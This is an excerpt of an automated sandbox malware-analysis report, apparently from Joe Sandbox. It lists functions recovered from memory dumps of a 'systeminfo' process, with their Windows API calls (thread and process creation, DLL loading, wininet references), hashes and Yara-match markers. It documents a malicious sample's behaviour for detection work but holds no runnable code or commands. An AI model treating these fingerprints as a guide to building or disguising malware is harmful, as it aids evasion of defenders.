                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: ccdf22895e73ae367dd6d8653570af8483bb5b322c0e12617a73a82ac9b00c18
                                                                                                                                                                                • Instruction ID: cf10a26bf5d0542dd30e1ac0a332027b3e992f6bcb066c813de3c0396025f529
                                                                                                                                                                                • Opcode Fuzzy Hash: ccdf22895e73ae367dd6d8653570af8483bb5b322c0e12617a73a82ac9b00c18
                                                                                                                                                                                • Instruction Fuzzy Hash: 5990023120140802F1907158440464A00558BD1306F96C025B042A674ECA25DB5977A2
                                                                                                                                                                                Function 04722BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: ad599d292ba93f0877d2661aff891f2e0cbcd6b036b959a7beef55046a68d689
                                                                                                                                                                                • Instruction ID: 8bb1f72bbcebb3eb26e8e92dfba6616536e538a69e681b8c5ca22833cc5c4583
                                                                                                                                                                                • Opcode Fuzzy Hash: ad599d292ba93f0877d2661aff891f2e0cbcd6b036b959a7beef55046a68d689
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F90023120544842F15071584404A4600658BD030AF56C021B04696B4E9635DE55B662
                                                                                                                                                                                Function 04722BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 3f181b2804ab4e405b21c666d25c9bbbcee04e14ccc4387d8da2e94aca71ce05
                                                                                                                                                                                • Instruction ID: 1dc7bc5e3645b7520f4a63523fa50d71819ba07ac82a8ea2f81b06231cceb108
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f181b2804ab4e405b21c666d25c9bbbcee04e14ccc4387d8da2e94aca71ce05
                                                                                                                                                                                • Instruction Fuzzy Hash: 0590023160540802F1607158441474600558BD0306F56C021B0429674E8765DB5576A2
                                                                                                                                                                                Function 047235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 1c8c887dd25191fbebed9450894bdb25175174fae648fbd3b1c7bcf0c59f2638
                                                                                                                                                                                • Instruction ID: b4d10f5f61ae4ee64ed1d8a3f58175861b97f9ca1103e295d49cfa742d2edb37
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c8c887dd25191fbebed9450894bdb25175174fae648fbd3b1c7bcf0c59f2638
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F90023160550402F1107158451470610558BD0206F66C421B0829578E87A5DA5175A3
                                                                                                                                                                                Function 047239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: a50ae000f2201dbed229196b9c7c65c5759c17e6f31d3733f4cca152730bc15b
                                                                                                                                                                                • Instruction ID: 04087390fbe802b1f4b7058d8b4c26cebc98c62b206cf6f089eb6ffde182f098
                                                                                                                                                                                • Opcode Fuzzy Hash: a50ae000f2201dbed229196b9c7c65c5759c17e6f31d3733f4cca152730bc15b
                                                                                                                                                                                • Instruction Fuzzy Hash: E390022124545102F160715C44046164055ABE0206F56C031B0C195B4E8565D9557222
                                                                                                                                                                                Function 005D3A00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 005D3ACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                • Opcode ID: 80d47f1b2770dc425ad21ff3b2b8c099e80828185e69961d6a7c7ff01649011a
                                                                                                                                                                                • Instruction ID: 98ba318fb78a61071659ed6863e1d502446ab4a0ced0569e6344c1a0eaee9335
                                                                                                                                                                                • Opcode Fuzzy Hash: 80d47f1b2770dc425ad21ff3b2b8c099e80828185e69961d6a7c7ff01649011a
                                                                                                                                                                                • Instruction Fuzzy Hash: F13160B1A00705BBD724DFA4C885FEBBBB8FB84700F14855EF549AB240D670AA41CBA5
                                                                                                                                                                                Function 005CF419 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                • Opcode ID: 3eed757c82b350cd0f476bf0c112fd5c30552d895563b313076209cbed693cae
                                                                                                                                                                                • Instruction ID: 9fda5ee6bae091da96e4f629f8443cb6ed9b89c13a18be9eaa75e96283a759af
                                                                                                                                                                                • Opcode Fuzzy Hash: 3eed757c82b350cd0f476bf0c112fd5c30552d895563b313076209cbed693cae
                                                                                                                                                                                • Instruction Fuzzy Hash: 95313075A0060AAFDB10DFD8D880DEFB7BAFF88304B108569E505A7215D775EE458BA0
                                                                                                                                                                                Function 005CF420 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                • Opcode ID: 8ffd90070cdc1e7f8cd57d78baf7dcb8e0b4920d9ef59d7c5bfffd09d8624f5d
                                                                                                                                                                                • Instruction ID: 45a2c7a9c37ff2b3056143b7b83f363bdcc62818b3dbea95c688ca33d8bb7dac
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ffd90070cdc1e7f8cd57d78baf7dcb8e0b4920d9ef59d7c5bfffd09d8624f5d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B312FB5A0060AAFDB10DFD8D880DEFB7BABF88304B108559E505EB214D775EE058BA0
                                                                                                                                                                                Function 005D9650 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 005D968C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID: D2\
                                                                                                                                                                                • API String ID: 3298025750-125810080
                                                                                                                                                                                • Opcode ID: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction ID: a734907962e50c0dffe3813e237b8cfa788f0f79914237842ea97fa2688f501a
                                                                                                                                                                                • Opcode Fuzzy Hash: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 32E092752002047FCA14EE58EC45FDB77ADEFC5710F404409F908A7241D670B810C7B9
                                                                                                                                                                                Function 005D9600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(005C19D6,?,2V],005C19D6,005D55DE,005D5632,?,005C19D6,005D55DE,00001000,?,?,00000000), ref: 005D963F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID: 2V]
                                                                                                                                                                                • API String ID: 1279760036-563429239
                                                                                                                                                                                • Opcode ID: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction ID: 65eef7cb8483655672dedd8392a18ee58f159a560bae1312b1444528d51ed80e
                                                                                                                                                                                • Opcode Fuzzy Hash: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE0ED762006157FDA14EE99DC45EDB77ADEFC9710F404419F908A7241DA70B9108BB6
                                                                                                                                                                                Function 005C4490 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005C4502
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                • Opcode ID: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction ID: 0e51a8a803cb2bdfe2f57a35777086d003870d7503358ace5d7f127b153b9f54
                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B0121B5D0020EABDF10DBE4DC96F9EBBB8AB54308F10419AE90897241F675EB54CB91
                                                                                                                                                                                Function 005D96E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,005C824E,00000010,00000000,?,?,00000044,00000000,00000010,005C824E,?,?,00000000), ref: 005D9743
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                • Opcode ID: 1d5a6ef5cefb707d6e3b8089309946eeb11cda7af8fecea57334ea16c418b43c
                                                                                                                                                                                • Instruction ID: 0ab31b027cac56fc6de880137adae2d4208b2abe80b2c3c12dff597ba7aff120
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d5a6ef5cefb707d6e3b8089309946eeb11cda7af8fecea57334ea16c418b43c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4301D2B2200208BFCB54DE89DC81EEB77ADAF8D754F418219BA09E3240D630FC51CBA5
                                                                                                                                                                                Function 005B9DC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 1e5321eddc2394ef7b2a18b5bbe636268aec256c6cd5df096917e63356e8c97a
                                                                                                                                                                                • Instruction ID: e04be575b97817a0dd3223c83178250472fe1c2a0ea3ee2118dca8c45b5270fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e5321eddc2394ef7b2a18b5bbe636268aec256c6cd5df096917e63356e8c97a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0653338071436E73061E99C03FE77A4CEBC2B61F24042AF70DDB2C1D991B41186A9
                                                                                                                                                                                Function 005B9DBD Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005B9E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: a44f9d19775917f59132dc6f471127b2b76d2a48a33fe2762b78f6f89db886ce
                                                                                                                                                                                • Instruction ID: 81bd784de1e1c52aedbc17e5aa87e2db26e3368da7cbfea609592d9658c05272
                                                                                                                                                                                • Opcode Fuzzy Hash: a44f9d19775917f59132dc6f471127b2b76d2a48a33fe2762b78f6f89db886ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE0D83338071536E63062A98D03FE76A4CAFC2F51F69041AF70DBF2C1D9A1B81086A9
                                                                                                                                                                                Function 005C8290 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005C82BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 3e3830f0d9de34877d6964a08f29d77a9167c369ed1ef0c375e208d959920254
                                                                                                                                                                                • Instruction ID: fd1b6df887a698601d315c5fdf95f8d5b1d5619ac966cf2f3a0b74ea6d3d2cc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3830f0d9de34877d6964a08f29d77a9167c369ed1ef0c375e208d959920254
                                                                                                                                                                                • Instruction Fuzzy Hash: 20E0DF393007082AFB20AAE8DC4AF723348AB49720F284A64BC5DCB2C1E938F8018254
                                                                                                                                                                                Function 005C8077 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,005C1CC0,005D7F1E,005D55DE,005C1C8D), ref: 005C80B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                • Opcode ID: cfa8de18d60eee9d5ed61edce85336c37f6a10d2de196f585210e127ddd93cb4
                                                                                                                                                                                • Instruction ID: 679daf11f8f3813b9b7d25a2462a03ce96e44088f07e1bd334a86f81337c7467
                                                                                                                                                                                • Opcode Fuzzy Hash: cfa8de18d60eee9d5ed61edce85336c37f6a10d2de196f585210e127ddd93cb4
                                                                                                                                                                                • Instruction Fuzzy Hash: CDE0DF71340206FEFA2097E4DC0BFA43B547B91300F1841A8F889EA282DA60A4048616
                                                                                                                                                                                Function 005C8289 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005C82BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 1374c31a42c9e127c904cb2fb1c9bdedb603ae4efc798865449a18b510dd228c
                                                                                                                                                                                • Instruction ID: abc5911edbd49efa7ef206c278235e96b897979219632e6c0405ed25ba728dd6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1374c31a42c9e127c904cb2fb1c9bdedb603ae4efc798865449a18b510dd228c
                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0DF3D3406002FFB209AE8CC4AF723B54BB49360F288614BC59CB2C1E938E8024240
                                                                                                                                                                                Function 005C8080 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,005C1CC0,005D7F1E,005D55DE,005C1C8D), ref: 005C80B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                • Opcode ID: 4f1cf0d555b21405ccf27fdb9c668af4365f5bb6572fe3779435581a75bd6208
                                                                                                                                                                                • Instruction ID: a9aa0e0122b2053fed2cb222475b7d883739f13eb0b1a0d7494620020d85dc17
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f1cf0d555b21405ccf27fdb9c668af4365f5bb6572fe3779435581a75bd6208
                                                                                                                                                                                • Instruction Fuzzy Hash: C1D05E713803053FFA50E6E5DC1BF663A8C6B85750F584069F98DEB2C2ED95F410426A
                                                                                                                                                                                Function 005C0DAB Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 005C0DBD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5b0000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                                                                • Instruction ID: 7bf1f3ddfde26bad39afdee9474cb3f1171f7fe2aa5e351008e7229113bec2c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0A972B8031CB8EB2291D06C42FFEBF6C9B81B00F0400ABFB40F40C1DA8028060AB6
                                                                                                                                                                                Function 04722C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: ba166577b3eb90896250a52e771318bdc1952c13986ff7dc6378d4d12de82fdd
                                                                                                                                                                                • Instruction ID: a27d231cf5a8b93060ddd0800f350a448f01ce39ac318a3a153dc8fdc29d9169
                                                                                                                                                                                • Opcode Fuzzy Hash: ba166577b3eb90896250a52e771318bdc1952c13986ff7dc6378d4d12de82fdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 14B09B719015D5C5FB11F760470871779506BD0705F16C071E2434661F4738D1D5F176

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 04A004DE Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction ID: 558dff014d1a48209fbbd42f0fb82106538e1745d66d6c27408b981e57c24bca
                                                                                                                                                                                • Opcode Fuzzy Hash: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F41DA7051CB0D4FE368AF68A041777B3E1FB89304F508A2DC98AC3291EA74F8468785
                                                                                                                                                                                Function 04A0DF29 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
